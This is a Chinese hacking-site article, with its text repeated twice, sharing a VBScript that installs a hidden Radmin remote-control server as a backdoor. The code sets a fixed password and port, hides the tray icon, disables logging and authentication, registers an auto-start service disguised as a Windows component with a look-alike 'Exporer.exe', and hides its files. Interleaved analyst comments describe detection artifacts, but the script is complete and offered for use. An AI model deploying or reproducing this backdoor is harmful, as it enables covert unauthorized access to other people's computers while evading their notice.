利用Vbs脚本实现radmin终极后门
导读:
在网上看到N多人做radmin后门,要导出注册表,而且还会被杀毒软件查杀。所以本人把自己写的脚本提供给大家分享。比较实用,希望大家喜欢。
' Analyst note: the page presents this script as a way to stage a hidden Radmin 2.0 server.
' The comments added here describe the artifacts each step leaves behind, for detection and cleanup.
' Errors are suppressed from here on, so a partial run can still leave some of the artifacts below.
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
' "." is passed as the machine name in the WMI moniker below (the local computer).
strComputer = "."
' StdOut is assigned but not used anywhere in the lines shown.
Set StdOut = WScript.StdOut
' Bind to the StdRegProv registry provider in root/default through WMI.
' NOTE(review): registry writes made this way are usually attributed to the WMI provider host
' rather than to wscript/cscript - confirm against your own registry telemetry.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer &"/root/default:StdRegProv")
' Create the Radmin key tree under HKEY_LOCAL_MACHINE one level at a time:
' SYSTEM/RAdmin, v2.0, Server, then the iplist and Parameters subkeys (paths are as printed on the page).
' This key tree on a host where Radmin was never deliberately installed is worth alerting on.
strKeyPath = "SYSTEM/RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' Second handle to the same provider, this time without an explicit impersonation level;
' the binary value writes later in the script go through this object.
Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv")
' Analyst note: this run writes the Radmin server settings as 4-byte binary values under the Parameters key.
' The meaning of each value is inferred from its name only - verify against Radmin 2.x documentation.
' For triage, the combination is what matters: one value set to 1 (DisableTrayIcon) and every other flag set to 0.
strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
' DisableTrayIcon is the only flag written as 1; presumably it hides the server's tray icon from the logged-on user.
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
' EnableEventLog and EnableLogFile are both written as 0; presumably this turns off the server's own logging,
' so connection evidence has to come from host or network telemetry instead.
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
' FilterIp = 0: presumably no source-address restriction on who may connect - confirm.
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
' NTAuthEnabled = 0: presumably Windows account authentication is off, leaving only the Radmin password - confirm.
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
' The author's trailing note on the next line says these 16 bytes are a registry export converted from
' hexadecimal to decimal, and it also prints the matching password. Because the value is fixed and public,
' the same 16 bytes on several hosts point to this script or a copy of it, and the credential must be treated as known.
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
' Analyst note: uBinary still holds the 16-byte array assigned just before this point; it is stored as the
' "Parameter" value, which the author's trailing note labels as the Radmin password.
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
' Bytes 5,4,0,0 read as a little-endian integer are 0x0405 = 1029, matching the author's trailing note (port 1029).
' This is not Radmin's default port (4899), so hunt for an unexpected listener on 1029 as well.
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
' Timeout is written as 10; the unit is not shown in the script.
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
' Re-binds oReg to the same StdRegProv provider.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
' Prepares the LogFilePath value; the actual write happens after the service-creation command below.
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
strValueName = "LogFilePath"
strValue = "c:/logfile.txt"
set wshshell=createobject ("wscript.shell")
' Runs sc.exe with window style 0 (hidden) to register an auto-start service named WinManageHelp whose binary
' is Exporer.exe under %systemroot%/system32 - a file name one letter away from explorer.exe.
' Detection: service-installation events (System log 7045; Security log 4697 when audited) and a script host
' spawning sc.exe. The return value stored in "a" is not checked.
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0)
' Writes LogFilePath even though EnableLogFile is written as 0 earlier in the script.
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
' Re-binds oReg again before the service key is edited.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
' Analyst note: the service's registry entry is edited directly under ControlSet001 rather than through
' CurrentControlSet, so check both locations when investigating.
strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp"
' Description and DisplayName are written to resemble a Windows component. The run-together text
' "Windows Media PlayerWindows Management Instrumentation Player Drivers." is distinctive enough to hunt on.
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
' ImagePath is written as an expandable string with a hard-coded c:/windows path and a /service argument.
strValueName = "ImagePath"
strValue = "c:/windows/system32/Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
' Starts the service with a hidden window (style 0).
a=wshshell.run ("net start WinManageHelp",0)
' Marks three files in system32 read-only, hidden and system: exporer.exe, AdmDll.dll and raddrv.dll.
' The lines shown never copy these files, so they have to arrive on the host by some other means.
' Hunting: files with these names and attributes in system32, and a script host spawning net or attrib.
' Cleanup covers the WinManageHelp service, the SYSTEM/RAdmin key tree and these three files.
b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0)
本文转自
http://www.bitscn.com/hack/safe/200802/124316.html
在网上看到N多人做radmin后门,要导出注册表,而且还会被杀毒软件查杀。所以本人把自己写的脚本提供给大家分享。比较实用,希望大家喜欢。
' Analyst note: the page presents this script as a way to stage a hidden Radmin 2.0 server.
' The comments added here describe the artifacts each step leaves behind, for detection and cleanup.
' Errors are suppressed from here on, so a partial run can still leave some of the artifacts below.
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
' "." is passed as the machine name in the WMI moniker below (the local computer).
strComputer = "."
' StdOut is assigned but not used anywhere in the lines shown.
Set StdOut = WScript.StdOut
' Bind to the StdRegProv registry provider in root/default through WMI.
' NOTE(review): registry writes made this way are usually attributed to the WMI provider host
' rather than to wscript/cscript - confirm against your own registry telemetry.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer &"/root/default:StdRegProv")
' Create the Radmin key tree under HKEY_LOCAL_MACHINE one level at a time:
' SYSTEM/RAdmin, v2.0, Server, then the iplist and Parameters subkeys (paths are as printed on the page).
' This key tree on a host where Radmin was never deliberately installed is worth alerting on.
strKeyPath = "SYSTEM/RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' Second handle to the same provider, this time without an explicit impersonation level;
' the binary value writes later in the script go through this object.
Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv")
' Analyst note: this run writes the Radmin server settings as 4-byte binary values under the Parameters key.
' The meaning of each value is inferred from its name only - verify against Radmin 2.x documentation.
' For triage, the combination is what matters: one value set to 1 (DisableTrayIcon) and every other flag set to 0.
strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
' DisableTrayIcon is the only flag written as 1; presumably it hides the server's tray icon from the logged-on user.
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
' EnableEventLog and EnableLogFile are both written as 0; presumably this turns off the server's own logging,
' so connection evidence has to come from host or network telemetry instead.
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
' FilterIp = 0: presumably no source-address restriction on who may connect - confirm.
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
' NTAuthEnabled = 0: presumably Windows account authentication is off, leaving only the Radmin password - confirm.
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
' The author's trailing note on the next line says these 16 bytes are a registry export converted from
' hexadecimal to decimal, and it also prints the matching password. Because the value is fixed and public,
' the same 16 bytes on several hosts point to this script or a copy of it, and the credential must be treated as known.
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
' Analyst note: uBinary still holds the 16-byte array assigned just before this point; it is stored as the
' "Parameter" value, which the author's trailing note labels as the Radmin password.
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
' Bytes 5,4,0,0 read as a little-endian integer are 0x0405 = 1029, matching the author's trailing note (port 1029).
' This is not Radmin's default port (4899), so hunt for an unexpected listener on 1029 as well.
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
' Timeout is written as 10; the unit is not shown in the script.
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
' Re-binds oReg to the same StdRegProv provider.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
' Prepares the LogFilePath value; the actual write happens after the service-creation command below.
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
strValueName = "LogFilePath"
strValue = "c:/logfile.txt"
set wshshell=createobject ("wscript.shell")
' Runs sc.exe with window style 0 (hidden) to register an auto-start service named WinManageHelp whose binary
' is Exporer.exe under %systemroot%/system32 - a file name one letter away from explorer.exe.
' Detection: service-installation events (System log 7045; Security log 4697 when audited) and a script host
' spawning sc.exe. The return value stored in "a" is not checked.
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0)
' Writes LogFilePath even though EnableLogFile is written as 0 earlier in the script.
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
' Re-binds oReg again before the service key is edited.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
' Analyst note: the service's registry entry is edited directly under ControlSet001 rather than through
' CurrentControlSet, so check both locations when investigating.
strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp"
' Description and DisplayName are written to resemble a Windows component. The run-together text
' "Windows Media PlayerWindows Management Instrumentation Player Drivers." is distinctive enough to hunt on.
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
' ImagePath is written as an expandable string with a hard-coded c:/windows path and a /service argument.
strValueName = "ImagePath"
strValue = "c:/windows/system32/Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
' Starts the service with a hidden window (style 0).
a=wshshell.run ("net start WinManageHelp",0)
' Marks three files in system32 read-only, hidden and system: exporer.exe, AdmDll.dll and raddrv.dll.
' The lines shown never copy these files, so they have to arrive on the host by some other means.
' Hunting: files with these names and attributes in system32, and a script host spawning net or attrib.
' Cleanup covers the WinManageHelp service, the SYSTEM/RAdmin key tree and these three files.
b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0)
本文转自
http://www.bitscn.com/hack/safe/200802/124316.html